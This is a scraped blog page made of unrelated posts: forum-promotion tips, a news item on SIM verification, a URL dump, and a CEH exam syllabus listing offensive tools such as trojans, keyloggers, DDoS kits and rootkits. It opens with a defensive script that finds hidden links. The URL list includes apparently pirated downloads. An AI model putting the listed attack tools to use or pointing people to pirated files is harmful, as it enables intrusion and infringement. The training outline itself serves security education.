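Looking for invisible links in View Source (point 5 above) is tedious on a large site, and the usual tricks are mechanical enough to scan for. The script below is an added example, not part of the original post: it parses a page with the standard-library `HTMLParser`, keeps a stack of open elements, and records every `<a href>` that sits inside a subtree made invisible by an inline `display:none`, `visibility:hidden`, zero font size, far off-screen positioning, or the HTML `hidden` attribute. That list of patterns is a heuristic I chose for the example, not a complete one (links hidden through an external stylesheet or script are not caught), and the sample page is constructed.

```python
"""Flag anchor tags that a visitor would never see in the rendered page.

Added example (not from the original post). Standard library only; the set of
"hidden" inline-style patterns is a heuristic and is an assumption, not a full
list, and SAMPLE_PAGE is a constructed input.
"""
import re
from html.parser import HTMLParser

# Inline-style patterns that make an element (and its descendants) invisible.
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none"
    r"|visibility\s*:\s*hidden"
    r"|font-size\s*:\s*0(?:px|pt|em)?\b"
    r"|(?:left|top|text-indent)\s*:\s*-\d{3,}px",
    re.IGNORECASE,
)

# Elements that never have a closing tag, so they must not stay on the stack.
VOID_TAGS = {"br", "img", "input", "meta", "link", "hr", "area", "base", "col", "source", "wbr"}


class HiddenLinkFinder(HTMLParser):
    """Track open elements and record every <a href> inside a hidden subtree."""

    def __init__(self):
        super().__init__()
        self._stack = []        # (tag, reason-or-None) for each open element
        self.hidden_links = []  # (href, reason) in document order

    @staticmethod
    def _hidden_reason(attrs):
        attrs = dict(attrs)
        if "hidden" in attrs:
            return "hidden attribute"
        match = HIDDEN_STYLE.search(attrs.get("style") or "")
        return "style: " + match.group(0) if match else None

    def handle_starttag(self, tag, attrs):
        reason = self._hidden_reason(attrs)
        if tag == "a":
            # Hidden if the anchor itself or any open ancestor is hidden.
            inherited = next((r for _, r in reversed(self._stack) if r), None)
            why = reason or inherited
            if why:
                self.hidden_links.append((dict(attrs).get("href", ""), why))
        if tag not in VOID_TAGS:
            self._stack.append((tag, reason))

    def handle_endtag(self, tag):
        # Pop back to the matching open tag; tolerate sloppy markup.
        for i in range(len(self._stack) - 1, -1, -1):
            if self._stack[i][0] == tag:
                del self._stack[i:]
                break


def find_hidden_links(html):
    """Return [(href, reason), ...] for every anchor hidden by the patterns above."""
    parser = HiddenLinkFinder()
    parser.feed(html)
    parser.close()
    return parser.hidden_links


# Constructed sample page: one normal link plus four hidden in different ways.
SAMPLE_PAGE = """<html><body>
<p>Welcome to our <a href="/about">about page</a>.</p>
<div style="display:none"><a href="http://example.invalid/one">one</a></div>
<a href="http://example.invalid/two" style="font-size:0px">two</a>
<div hidden><p><a href="http://example.invalid/three">three</a></p></div>
<div style="position:absolute; left:-9999px"><a href="http://example.invalid/four">four</a></div>
</body></html>"""


if __name__ == "__main__":
    for href, why in find_hidden_links(SAMPLE_PAGE):
        print(f"{href}\t({why})")
```

Feed it the saved source of each page (or fetch the pages yourself) and review the hits; a link to a domain you have no business relationship with, wrapped in a hidden element, is the classic sign of an injected SEO spam block.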
How to Use Forums to Promote Your Blog
- By Sourabh Banerjee
- 0 comments
Having a blog is a great thing: you can advertise your products and services and get a lot of attention for your business; you can promote your work as a painter, photographer, or writer, and perhaps even get a job related to the things you love; or you can simply express yourself and keep your family and friends updated on your life, which is especially useful if you live far away and cannot update them more often.
A blog can also be a good way to earn money, beyond mere expression and promotion.
Thanks to the many online money-earning schemes available, you can earn commissions when visitors come to your blog. For example, you can place advertisements on your site through an affiliate network or an advertising program. If one of your visitors clicks on an advertisement, you earn a commission. The advertisements are tailored to the content of the page, so that your visitors are likely to be interested in them and click on them. You therefore need good content, because that is what the ad networks use to decide which advertisements to place on your site.
Moreover, the more visitors you have, the greater the chance that someone will click on your advertisements and earn you a commission.
This means you need to attract more people to your blog, not just for income but for attention. After all, if your blog is interesting enough, you may get plenty of people linking to you. One way to promote your blog is by posting on forums.
If you are thinking of posting in forums to get your voice heard, and want your blog noticed on the web, the following points may interest you. Note that these are only a few pointers on the road to blog stardom; you should learn along the way and pick up your own lessons too.
- Post in a forum whose topic you are genuinely interested in. Believe it or not, your level of knowledge of and interest in a topic will show through in your posts. If people see that you are really interested in the forum's subject, you may get more attention than you would from people who merely skim your post.
- Post in a forum whose subject is related to your blog's theme. This is essential when you are dealing with die-hard fans of a particular artist or film, because off-topic posts in a forum full of users with a single interest are distracting, not to mention grounds for being kicked out of the forum.
- Have the dignity to spell properly. Text-message shortcuts make posts almost unreadable and annoy a great many people. If you make the effort to write well on your blog, make the effort to write well on forums too, or you may find it harder to get people to read your blog. Why should they read your blog when they cannot even understand what you post on the forum?
- Help other forum members when they need it. Remember, people don't care what you have to say until they find out that you care about them first.
source : net
Govt to DoT: Ensure strict verification for SIMs
- By Sourabh Banerjee
- 0 comments
NEW DELHI: In the backdrop of mobile phones having Indian SIM cards and UAE's Thuraya satellite phone used by Pakistani terrorists during Mumbai attack last week, the home ministry on Wednesday asked the department of telecommunication (DoT) to quickly devise a mechanism of a "strict consumer verification" exercise and formulate a comprehensive policy on "monitoring and intercepting" sat phones.
The ministry's concerns were conveyed to DoT after the issue came up for discussion in a high-level meeting chaired by home minister P Chidambaram who reviewed all aspects of telecom having security implications.
The issue of use of Chinese mobile phone handsets — which do not have International Mobile Equipment Identities (IMEI) — also came up for discussion. Since it is the IMEI number which mainly helps agencies to trace the handset user, the intelligence agencies had recently pitched for a ban on Chinese handsets.
The minister was, however, informed that DoT, taking such concerns in mind, has already "directed all the access service providers to make provision of Equipment Identity Registry (EIR) so that calls without IMEI or Electronic Serial Number (ESN) or those with IMEI or ESN with all zeros are not processed, and rejected".
Besides senior home ministry and DoT officials, the meeting was also attended by senior officers of IB, RAW and the National Technical Research Organisation (NTRO). The NTRO keeps track of technological aspects of intelligence in coordination with other agencies.
Sources in the ministry said that DoT had proposed to set up a National Surveillance Grid to create a centralized communication monitoring agency. The Grid would help remove the multiplicity of authorities in telecom/internet/Voice Over Internet Protocol monitoring exercises, as currently this is being done by different agencies, they added.
At present, interception of sat phones is a big problem in India as none of the international operators have a hub here. Since these phones — provided by operators like UAE's Thuraya and a consortium led by Inmarsat — do not need interconnectivity with the network of any country's domestic network, they can be used anywhere in the world without any hitch.
Source : Net news
LEARN GERMAN LANGUAGE :
- Monday, August 8, 2011
- By Sourabh Banerjee
- 0 comments
http://www.germanlanguagecentre.com/
http://www.9down.com/category/movies/tag-hdtv/
http://www.germanlanguagecentre.com/COURSES.html
glc.patna@gmail.com
IMPORTANT & INTERESTING URLs
- By Sourabh Banerjee
- 0 comments
http://www.koflash.com/category/photography/#22 FLASH
http://www.flashxml.net/
http://www.timothy-hogan.com/
http://pixlr.com/editor/#3832 ONline picture editor
http://www.wallcate.com/2010/09/predators-wallpapers.html wallpapers
http://www.onestopwebmasters.com/top-5-beta-windows-8-desktop-wallpapers/
http://www.maangchi.com/wp-content/downloads/Cooking_Korean_Food_With_Maangchi_Cookbook.pdf
http://www.maangchi.com/wp-content/downloads/Cooking_Korean_Food_With_Maangchi_Cookbook_book_2.pdf don
http://www.maangchi.com/wp-content/downloads/Cooking_Korean_Food_With_Maangchi_Cookbook_books_1_and_2.pdf don
http://www.maangchi.com/wp-content/downloads/Cooking_Korean_Food_With_Maangchi_book_3.pdf don
http://www.maangchi.com/
http://www.legendscrolls.co.uk/quillpad/packages/QuillPadInstaller.jar
http://www.softwareag.com/gc/bpmfordummies.html?gclid=CKflr-uHsKoCFQUb6wodZRJq8Q
http://www.4shared.com/get/a5UZqfZt/_Knitting__Jan_Eaton_-_Funky_C.html 65 mb don
www.kidsfortigers.org
www.about.com
www.whyfiles.org
windows2universe.org
howstuffworks.com
snaps also
http://prabhatkhabar.com/taxonomy/term/21?page=2
http://www.search.tk/index.html&_=1312273062
http://bradblogging.com/featured/6150-high-quality-icons-for-pratical-website-design-blog-design-usage/
http://bradblogging.com/featured/6150-high-quality-icons-for-pratical-website-design-blog-design-usage/
http://www.freewarefiles.com/BluePOS-Caller-ID_program_45232.html
http://www.honeytechblog.com/your-next-lifesaver-is-hirens-boot-cd-94/
http://www.4shared.com/get/aFLl4yZn/HirensBootCD93__9DownCOM.html
http://www.4shared.com/get/aFLl4yZn/HirensBootCD93__9DownCOM.html?tsid=20110730-052223-b9ecc79d
http://storemags.com/webuser-14-july-2011-uk/
http://www.4shared.com/get/ovF6hYHH/Anti_Virus_for_Linux.html don
http://www.4shared.com/get/giyWR_B6/Wireless_Books.html don
http://www.4shared.com/get/728xjFgY/UBX86.html
http://en.wikipedia.org/wiki/History_of_Microsoft_Windows : History of Microsoft Windows
http://www.soft-games.com/php/categories.php?id_categoria=5&ordenar=&pagina=5 GAMES
http://www.soft-games.com/php/software.php?id_programa=2264&download-Image-Analyzer-1.29 IMAGE EDITOR
http://www.zoesoft.com/console-calculator/ccalc-downloads/ : console-calculator
http://www.youngcomposers.com/ COMPOSE YOUR OWN MUSIC
http://wiki.youngcomposers.com/ COMPOSE YOUR OWN MUSIC
http://1337x.org/search/windows+8/2/ : WINDOWS 8 DOWNLOADS
CEH: Ethical Hacking and Countermeasures (312-50)
- Wednesday, July 20, 2011
- By Sourabh Banerjee
- 0 comments
Ethical Hacking and Countermeasures (312-50)
• The exam codes EC0-350 and 312-50 refer to the same exam.
• The exam titles "Certified Ethical Hacker" and "Ethical Hacking and Countermeasures" refer to the same exam.
• VUE and Prometric systems use different exam codes.
• The CEHv4 exam has been retired since June 1st 2007.
• The CEHv5 exam is available at Prometric Prime, APTC and VUE.
• Exams at VUE and Prometric APTC require an Eligibility Code.
• Please visit http://www.eccouncil.org/takeexam.htm for details.
• Credit Towards Certification
Certified Ethical Hacker
Master of Security Science (MSS)
Skills Measured
The Exam 312-50 tests CEH candidates on the following 22 domains.
1. Ethics and Legal Issues
2. Footprinting
3. Scanning
4. Enumeration
5. System Hacking
6. Trojans and Backdoors
7. Sniffers
8. Denial of Service
9. Social Engineering
10. Session Hijacking
11. Hacking Web Servers
12. Web Application Vulnerabilities
13. Web Based Password Cracking Techniques
14. SQL Injection
15. Hacking Wireless Networks
16. Virus and Worms
17. Physical Security
18. Hacking Linux
19. IDS, Firewalls and Honeypots
20. Buffer Overflows
21. Cryptography
22. Penetration Testing Methodologies
Ethics and Legality
Understand Ethical Hacking terminology
Define the Job role of an ethical hacker
Understand the different phases involved in ethical hacking
Identify different types of hacking technologies
List the 5 stages of ethical hacking
What is hacktivism?
List different types of hacker classes
Define the skills required to become an ethical hacker
What is vulnerability research?
Describe the ways in conducting ethical hacking
Understand the Legal implications of hacking
Understand 18 U.S.C. § 1030 US Federal Law
Footprinting
Define the term Footprinting
Describe information gathering methodology
Describe competitive intelligence
Understand DNS enumeration
Understand Whois, ARIN lookup
Identify different types of DNS records
Understand how traceroute is used in Footprinting
Understand how e-mail tracking works
Understand how web spiders work
Scanning
Define the term port scanning, network scanning and vulnerability scanning
Understand the CEH scanning methodology
Understand Ping Sweep techniques
Understand nmap command switches
Understand SYN, Stealth, XMAS, NULL, IDLE and FIN scans
List TCP communication flag types
Understand War dialing techniques
Understand banner grabbing and OS fingerprinting techniques
Understand how proxy servers are used in launching an attack
How do anonymizers work?
Understand HTTP tunneling techniques
Understand IP spoofing techniques
Enumeration
What is Enumeration?
What is meant by null sessions
What is SNMP enumeration?
What are the steps involved in performing enumeration?
System hacking
Understanding password cracking techniques
Understanding different types of passwords
Identifying various password cracking tools
Understand Escalating privileges
Understanding keyloggers and other spyware technologies
Understand how to Hide files
Understanding rootkits
Understand Steganography technologies
Understand how to cover your tracks and erase evidence
Trojans and Backdoors
What is a Trojan?
What is meant by overt and covert channels?
List the different types of Trojans
What are the indications of a Trojan attack?
Understand how “Netcat” Trojan works
What is meant by “wrapping”
How does reverse connecting Trojans work?
What are the countermeasure techniques in preventing Trojans?
Understand Trojan evading techniques
Sniffers
Understand the protocol susceptible to sniffing
Understand active and passive sniffing
Understand ARP poisoning
Understand ethereal capture and display filters
Understand MAC flooding
Understand DNS spoofing techniques
Describe sniffing countermeasures
Denial of Service
Understand the types of DoS Attacks
Understand how DDoS attack works
Understand how BOTs/BOTNETS work
What is “smurf” attack
What is “SYN” flooding
Describe the DoS/DDoS countermeasures
Social Engineering
What is Social Engineering?
What are the Common Types of Attacks
Understand Dumpster Diving
Understand Reverse Social Engineering
Understand Insider attacks
Understand Identity Theft
Describe Phishing Attacks
Understand Online Scams
Understand URL obfuscation
Social Engineering countermeasures
Session Hijacking
Understand Spoofing vs. Hijacking
List the types of Session Hijacking
Understand Sequence Prediction
What are the steps in performing session hijacking
Describe how you would prevent session hijacking
Hacking Web Servers
List the types of web server vulnerabilities
Understand the attacks Against Web Servers
Understand IIS Unicode exploits
Understand patch management techniques
Understand Web Application Scanner
What is Metasploit Framework?
Describe Web Server hardening methods
Web Application Vulnerabilities
Understanding how web application works
Objectives of web application hacking
Anatomy of an attack
Web application threats
Understand Google hacking
Understand Web Application Countermeasures
Web Based Password Cracking Techniques
List the Authentication types
What is a Password Cracker?
How does a Password Cracker work?
Understand Password Attacks - Classification
Understand Password Cracking Countermeasures
SQL Injection
What is SQL injection?
Understand the Steps to conduct SQL injection
Understand SQL Server vulnerabilities
Describe SQL Injection countermeasures
Wireless Hacking
Overview of WEP, WPA authentication systems and cracking techniques
Overview of wireless Sniffers and SSID, MAC Spoofing
Understand Rogue Access Points
Understand Wireless hacking techniques
Describe the methods in securing wireless networks
Virus and Worms
Understand the difference between a virus and a worm
Understand the types of Viruses
How a virus spreads and infects the system
Understand antivirus evasion techniques
Understand Virus detection methods
Physical Security
Physical security breach incidents
Understanding physical security
What is the need for physical security?
Who is accountable for physical security?
Factors affecting physical security
Linux Hacking
Understand how to compile a Linux Kernel
Understand GCC compilation commands
Understand how to install LKM modules
Understand Linux hardening methods
Evading IDS, Honeypots and Firewalls
List the types of Intrusion Detection Systems and evasion techniques
List firewall and honeypot evasion techniques
Buffer Overflows
Overview of stack based buffer overflows
Identify the different types of buffer overflows and methods of detection
Overview of buffer overflow mutation techniques
Cryptography
Overview of cryptography and encryption techniques
Describe how public and private keys are generated
Overview of MD5, SHA, RC4, RC5, Blowfish algorithms
Penetration Testing Methodologies
Overview of penetration testing methodologies
List the penetration testing steps
Overview of the Pen-Test legal framework
Overview of the Pen-Test deliverables
List the automated penetration testing tools
Course Outline Version 5
Module 1: Introduction to Ethical Hacking
Why Security?
Essential Terminologies
Elements of Security
The Security, Functionality, and Ease of Use Triangle
What Does a Malicious Hacker Do?
o Reconnaissance
o Scanning
o Gaining access
o Maintaining access
o Covering Tracks
Types of Hacker Attacks
o Operating System attacks
o Application-level attacks
o Shrink Wrap code attacks
o Misconfiguration attacks
Hacktivism
Hacker Classes
Hacker Classes and Ethical Hacking
What Do Ethical Hackers Do?
Can Hacking be Ethical?
How to Become an Ethical Hacker?
Skill Profile of an Ethical Hacker
What is Vulnerability Research?
Why Hackers Need Vulnerability Research?
Vulnerability Research Tools
Vulnerability Research Websites
How to Conduct Ethical Hacking?
Approaches to Ethical Hacking
Ethical Hacking Testing
Ethical Hacking Deliverables
Computer Crimes and Implications
Legal Perspective
o U.S. Federal Law
o Japan’s Cyber Laws
o United Kingdom’s Cyber Laws
o Australia’s Cyber Laws
o Germany’s Cyber Laws
o Singapore’s Cyber Laws
Module 2: Footprinting
Revisiting Reconnaissance
Defining of Footprinting
Information Gathering Methodology
Unearthing Initial Information
Finding a Company’s URL
Internal URL
Extracting Archive of a Website
Google Search for Company’s Info.
People Search
Footprinting Through Job Sites
Passive Information Gathering
Competitive Intelligence Gathering
Why Do You Need Competitive Intelligence?
Companies Providing Competitive Intelligence Services
Competitive Intelligence
o When Did This Company Begin?
o How Did It Develop?
o What Are This Company's Plans?
o What Does Expert Opinion Say About The Company?
o Who Are The Leading Competitors?
Public and Private Websites
Tools
o DNS Enumerator
o SpiderFoot
o Sensepost Footprint Tools
• BiLE.pl
• BiLE-weigh.pl
• tld-expand.pl
• vet-IPrange.pl
• qtrace.pl
• vet-mx.pl
• jarf-rev
• jarf-dnsbrute
o Wikito Footprinting Tool
o Web Data Extractor Tool
o Whois
o Nslookup
o Necrosoft
o ARIN
o Traceroute
o Neo Trace
o GEOSpider
o Geowhere
o GoogleEarth
o VisualRoute Trace
o Kartoo Search Engine
o Touchgraph Visual Browser
o SmartWhois
o VisualRoute Mail Tracker
o eMailTrackerPro
o Read Notify
o HTTrack Web Site Copier
o Web Ripper
o robots.txt
o Website watcher
o E-mail Spider
o Power E-mail Collector Tool
Steps to Perform Footprinting
Module 3: Scanning
Definition of Scanning
Types of Scanning
o Port Scanning
o Network Scanning
o Vulnerability Scanning
Objectives of Scanning
CEH Scanning Methodology
o Check for live systems
• ICMP Scanning
• Angry IP
• HPING2
• Ping Sweep
• Firewalk
o Check for open ports
• Nmap
• TCP Communication Flags
• Three Way Handshake
• SYN Stealth / Half Open Scan
• Stealth Scan
• Xmas Scan
• FIN Scan
• NULL Scan
• IDLE Scan
• ICMP Echo Scanning/List Scan
• TCP Connect / Full Open Scan
• FTP Bounce Scan
• FTP Bounce Attack
• SYN/FIN Scanning Using IP Fragments
• UDP Scanning
• Reverse Ident Scanning
• RPC Scan
• Window Scan
• Blaster Scan
• PortScan Plus, Strobe
• IPSecScan
• NetScan Tools Pro
• WUPS – UDP Scanner
• SuperScan
• IPScanner
• MegaPing
• Global Network Inventory Scanner
• Net Tools Suite Pack
• FloppyScan
• War Dialer Technique
• Why War Dialing?
• Wardialing
• PhoneSweep
• THC Scan
• SandTrap Tool
o Banner grabbing/OS Fingerprinting
• OS Fingerprinting
• Active Stack Fingerprinting
• Passive Fingerprinting
• Active Banner Grabbing Using Telnet
• GET REQUESTS
• p0f – Banner Grabbing Tool
• p0f for Windows
• Httprint Banner Grabbing Tool
• Active Stack Fingerprinting
• XPROBE2
• RING V2
• Netcraft
• Disabling or Changing Banner
• Apache Server
• IIS Server
• IIS Lockdown Tool
• ServerMask
• Hiding File Extensions
• PageXchanger 2.0
o Identify Service
o Scan for Vulnerability
• Bidiblah Automated Scanner
• Qualys Web-based Scanner
• SAINT
• ISS Security Scanner
• Nessus
• GFI LANGuard
• SATAN (Security Administrator’s Tool for Analyzing Networks)
• Retina
• NIKTO
• SAFEsuite Internet Scanner
• IdentTCPScan
o Draw network diagrams of Vulnerable hosts
• Cheops
• FriendlyPinger
o Prepare proxies
• Proxy Servers
• Use of Proxies for Attack
• SocksChain
• Proxy Workbench
• ProxyManager Tool
• Super Proxy Helper Tool
• Happy Browser Tool (Proxy-based)
• MultiProxy
• TOR Proxy Chaining Software
o Anonymizers
• Primedius Anonymizer
• Browzar
• Torpark Browser
• G-Zapper - Google Cookies
o SSL Proxy Tool
o HTTP Tunneling Techniques
o HTTPort
o Spoofing IP Address - Source Routing
o Detecting IP Spoofing
o Despoof Tool
o Scanning Countermeasures
o Tool: SentryPC
Module 4: Enumeration
Overview of System Hacking Cycle
What is Enumeration?
Techniques for Enumeration
NetBIOS Null Sessions
Tool
o DumpSec
o NetBIOS Enumeration Using Netview
o Nbtstat
o SuperScan4
o Enum
o sid2user
o user2sid
o GetAcct
Null Session Countermeasures
PSTools
o PsExec
o PsFile
o PsGetSid
o PsKill
o PsInfo
o PsList
o PsLoggedOn
o PsLogList
o PsPasswd
o PsService
o PsShutdown
o PsSuspend
o PsUptime
SNMP Enumeration
Management Information Base
Tools
o SNMPutil
o Solarwinds
o SNScan V1.05
o Getif SNMP MIB Browser
UNIX Enumeration
SNMP UNIX Enumeration
SNMP Enumeration Countermeasures
Tools
o Winfingerprint
o Windows Active Directory Attack Tool
o IP Tools Scanner
o Enumerate Systems Using Default Passwords
Steps to Perform Enumeration
Module 5: System Hacking
Cracking Passwords
o Password Types
o Types of Password Attacks
o Passive Online – Wire Sniffing
o Passive Online Attacks
o Active Online – Password Guessing
o Offline Attacks
• Dictionary Attack
• Hybrid Attack
• Brute-force Attack
• Pre-computed Hashes
o Non-Technical Attacks
o Password Mitigation
o Permanent Account Lockout – Employee Privilege Abuse
o Administrator Password Guessing
o Manual Password Cracking Algorithm
o Automatic Password Cracking Algorithm
o Performing Automated Password Guessing
o Tools
• NAT
• Smbbf (SMB Passive Brute Force Tool)
• SmbCrack Tool
• Legion
• L0phtCrack
o Microsoft Authentication - LM, NTLMv1, and NTLMv2
o Kerberos Authentication
o What is LAN Manager Hash?
o Salting
o Tools
• PWdump2 and Pwdump3
• Rainbowcrack
• KerbCrack
• NBTDeputy
• NetBIOS DoS Attack
• John the Ripper
o Password Sniffing
o How to Sniff SMB Credentials?
o Sniffing Hashes Using L0phtCrack
o Tools
• ScoopLM
• SMB Replay Attacks
• Replay Attack Tool: SMBProxy
• Hacking Tool: SMB Grind
• Hacking Tool: SMBDie
o SMBRelay Weaknesses & Countermeasures
o Password Cracking Countermeasures
o LM Hash Backward Compatibility
o How to Disable LM HASH?
o Tools
• Password Brute-Force Estimate Tool
• Syskey Utility
Escalating Privileges
o Privilege Escalation
o Cracking NT/2000 Passwords
o Active@ Password Changer
o Change Recovery Console Password
o Privilege Escalation Tool: x.exe
Executing applications
o Tool:
• Psexec
• Remoexec
• Alchemy Remote Executor
• Keystroke Loggers
• E-mail Keylogger
• Spytector FTP Keylogger
• IKS Software Keylogger
• Ghost Keylogger
• Hardware Keylogger
• Keyboard Keylogger: KeyGhost Security Keyboard
• USB Keylogger: KeyGhost USB Keylogger
o What is Spyware?
o Tools
• Spyware: Spector
• Remote Spy
• eBlaster
• Stealth Voice Recorder
• Stealth Keylogger
• Stealth Website Logger
• Digi-Watcher Video Surveillance
• Desktop Spy Screen Capture Program
• Telephone Spy
• Print Monitor Spy Tool
• Perfect Keylogger
• Stealth Email Redirector
• Spy Software: Wiretap Professional
• Spy Software: FlexiSpy
• PC PhoneHome
o Keylogger Countermeasures
o Anti-Keylogger
o PrivacyKeyboard
Hiding Files
o Hacking Tool: RootKit
o Why Rootkits?
o Rootkits in Linux
o Detecting Rootkits
o Rootkit Detection Tools
• BlackLight from F-Secure Corp
• RootkitRevealer from Sysinternals
• Malicious Software Removal Tool from Microsoft Corp
o Sony Rootkit Case Study
o Planting the NT/2000 Rootkit
o Rootkits
• Fu
• AFX Rootkit 2005
• Nuclear
• Vanquish
o Rootkit Countermeasures
o Patchfinder2.0
o RootkitRevealer
o Creating Alternate Data Streams
o How to Create NTFS Streams?
o NTFS Stream Manipulation
o NTFS Streams Countermeasures
o NTFS Stream Detectors
• ADS Spy
• ADS Tools
o What is Steganography?
o Tools
• Merge Streams
• Invisible Folders
• Invisible Secrets 4
• Image Hide
• Stealth Files
• Steganography
• Masker Steganography Tool
• Hermetic Stego
• DCPP – Hide an Operating System
• Camera/Shy
• Mp3Stego
• Snow.exe
o Video Steganography
o Steganography Detection
o SIDS (Stego Intrusion Detection System)
o High-Level View
o Tool: dskprobe.exe
Covering tracks
o Disabling Auditing
o Clearing the Event Log
o Tools
• elsave.exe
• Winzapper
• Evidence Eliminator
• Traceless
• Tracks Eraser Pro
• ZeroTracks
Module 6: Trojans and Backdoors
Introduction
Effect on Business
What is a Trojan?
Overt and Covert Channels
Working of Trojans
Different Types of Trojans
What Do Trojan Creators Look For?
Different Ways a Trojan Can Get into a System
Indications of a Trojan Attack
Ports Used by Trojans
How to Determine which Ports are “Listening”?
Classic Trojans Found in the Wild
Trojans
o Tini
o iCmd
o NetBus
o Netcat
o Beast
o MoSucker
o Proxy Server
o SARS Trojan Notification
Wrappers
Wrapper Covert Program
Wrapping Tools
o One file EXE Maker
o Yet Another Binder
o Pretator Wrapper
Packaging Tool: WordPad
RemoteByMail
Tool: Icon Plus
Defacing Application: Restorator
HTTP Trojans
Trojan Attack through HTTP
HTTP Trojan (HTTP RAT)
Shttpd Trojan - HTTP Server
Reverse Connecting Trojans
Nuclear RAT Trojan (Reverse Connecting)
Tool: BadLuck Destructive Trojan
ICMP Tunneling
ScreenSaver Password Hack Tool – Dummylock
Trojan
o Phatbot
o Amitis
o Senna Spy
o QAZ
o Back Orifice
o Back Orifice 2000
o SubSeven
o CyberSpy Telnet Trojan
o Subroot Telnet Trojan
o Let Me Rule! 2.0 BETA 9
o Donald Dick
o RECUB
Hacking Tool: Loki
Atelier Web Remote Commander
Trojan Horse Construction Kit
How to Detect Trojans?
Tools
o Netstat
o fPort
o TCPView
o CurrPorts
o Process Viewer
o What’s on My Computer
o Super System Helper
Delete Suspicious Device Drivers
Inzider - Tracks Processes and Ports
Tools
o What's Running?
o MSConfig
o Registry-What’s Running
o Autoruns
o Hijack This (System Checker)
o Startup List
Anti-Trojan Software
Evading Anti-Virus Techniques
Evading Anti-Trojan/Anti-Virus Using Stealth Tools v2.0
Backdoor Countermeasures
Tools
o Tripwire
o System File Verification
o MD5sum.exe
o Microsoft Windows Defender
How to Avoid a Trojan Infection?
Module 7: Sniffers
Definition of Sniffing
Protocols Vulnerable to Sniffing
o Tool: Network View – Scans the Network for Devices
o The Dude Sniffer
o Ethereal
o tcpdump
Types of Sniffing
o Passive Sniffing
o Active sniffing
ARP - What is Address Resolution Protocol?
ARP Spoofing Attack
o How Does ARP Spoofing Work?
o ARP Poisoning
o MAC Duplicating Attack
Tools for ARP Spoofing
o Arpspoof (Linux-based tool)
o Ettercap (Linux and Windows)
MAC Flooding
Tools for MAC Flooding
o Macof (Linux-based tool)
o Etherflood (Linux and Windows)
Threats of ARP Poisoning
IRS – ARP Attack Tool
ARPWorks Tool
Tool: Nemesis
Sniffer Hacking Tools (dsniff package)
o Arpspoof
o Dnsspoof
o Dsniff
o Filesnarf
o Mailsnarf
o Msgsnarf
o Tcpkill
o Tcpnice
o Urlsnarf
o Webspy
o Webmitm
DNS Poisoning Techniques
Types of DNS Poisoning:
o Intranet DNS Spoofing (Local network)
o Internet DNS Spoofing (Remote network)
o Proxy Server DNS Poisoning
o DNS Cache Poisoning
Interactive TCP Relay
Sniffers
o HTTP Sniffer: EffeTech
o Ace Password Sniffer
o MSN Sniffer
o SmartSniff
o Session Capture Sniffer: NetWitness
o Session Capture Sniffer: NWreader
o Cain and Abel
o Packet Crafter Craft Custom TCP/IP Packets
o SMAC
o NetSetMan Tool
o Raw Sniffing Tools
o Sniffit
o Aldebaran
o Hunt
o NGSSniff
o Ntop
o Pf
o IPTraf
o EtherApe
o Netfilter
o Network Probe
o Maa Tec Network Analyzer
Tools
o Snort
o Windump
o Etherpeek
o Mac Changer
o Iris
o NetIntercept
o WinDNSSpoof
How to Detect Sniffing?
AntiSniff Tool
ArpWatch Tool
Countermeasures
Module 8: Denial of Service
What are Denial of Service Attacks?
Goal of DoS
Impact and the Modes of Attack
Types of Attacks
o DoS attack
o DDoS attack
DoS Attack Classification
o Smurf
o Buffer Overflow Attack
o Ping of death
o Teardrop
o SYN Attack
DoS Attack Tools
o Jolt2
o Bubonic.c
o Land and LaTierra
o Targa
o Blast20
o Nemesy
o Panther2
o Crazy Pinger
o Some Trouble
o UDP Flood
o FSMax
Botnets
Uses of botnets
Types of Bots
o Agobot/Phatbot/Forbot/XtremBot
o SDBot/RBot/UrBot/UrXBot
o mIRC-based Bots - GT-Bots
Tool: Nuclear Bot
What is DDoS Attack?
Characteristics of DDoS Attacks
DDoS Unstoppable
Agent Handler Model
DDoS IRC based Model
DDoS Attack Taxonomy
Amplification Attack
Reflective DNS Attacks
Reflective DNS Attacks Tool: ihateperl.pl
DDoS Tools
o Trin00
o Tribe Flood Network (TFN)
o TFN2K
o Stacheldraht
o Shaft
o Trinity
o Knight
o Mstream
o Kaiten
Worms
Slammer Worm
Spread of Slammer Worm – 30 min
MyDoom.B
SCO Against MyDoom Worm
How to Conduct a DDoS Attack
The Reflected DoS Attacks
Reflection of the Exploit
Countermeasures for Reflected DoS
DDoS Countermeasures
Taxonomy of DDoS Countermeasures
Preventing Secondary Victims
Detect and Neutralize Handlers
Detect Potential Attacks
Mitigate or Stop the Effects of DDoS Attacks
Deflect Attacks
Post-attack Forensics
Packet Traceback
Module 9: Social Engineering
What is Social Engineering?
Human Weakness
“Rebecca” and “Jessica”
Office Workers
Types of Social Engineering
o Human-based
o Computer-based
Preventing Insider Threat
Common Targets of Social Engineering
Factors that make Companies Vulnerable to Attacks
Why is Social Engineering Effective?
Warning Signs of an Attack
Tool: Netcraft Anti-Phishing Toolbar
Phases in a Social Engineering Attack
Behaviors Vulnerable to Attacks
Impact on the Organization
Countermeasures
Policies and Procedures
Security Policies - Checklist
Phishing Attacks and Identity Theft
What is Phishing?
Phishing Report
Attacks
Hidden Frames
URL Obfuscation
URL Encoding Techniques
IP Address to Base 10 Formula
Karen’s URL Discombobulator
HTML Image Mapping Techniques
Fake Browser Address Bars
Fake Toolbars
Fake Status Bar
DNS Cache Poisoning Attack
Module 10: Session Hijacking
What is Session Hijacking?
Spoofing vs. Hijacking
Steps in Session Hijacking
Types of Session Hijacking
o Active
o Passive
The 3-Way Handshake
TCP Concepts 3-Way Handshake
Sequence Number Prediction
TCP/IP Hijacking
RST Hijacking
RST Hijacking Tool: hijack_rst.sh
Programs that Perform Session Hijacking
Hacking Tools
o Juggernaut
o Hunt
o TTY Watcher
o IP Watcher
o T-Sight
o Paros HTTP Session
Remote TCP Session Reset Utility
Dangers Posed by Hijacking
Protecting against Session Hijacking
Countermeasure: IP Security
IP-SEC
Module 11: Hacking Web Servers
How Web Servers Work
How are Web Servers Compromised?
How are Web Servers Defaced?
Apache Vulnerability
Attacks Against IIS
o IIS Components
o IIS Directory Traversal (Unicode) Attack
Unicode
o Unicode Directory Traversal Vulnerability
Hacking Tool: IISxploit.exe
Msw3prt IPP Vulnerability
WebDAV / ntdll.dll Vulnerability
RPC DCOM Vulnerability
ASN Exploits
ASP Trojan (cmd.asp)
IIS Logs
Network Tool: Log Analyzer
Hacking Tool: CleanIISLog
Unspecified Executable Path Vulnerability
Metasploit Framework
Immunity CANVAS Professional
Core Impact
Hotfixes and Patches
What is Patch Management?
Solution: UpdateExpert
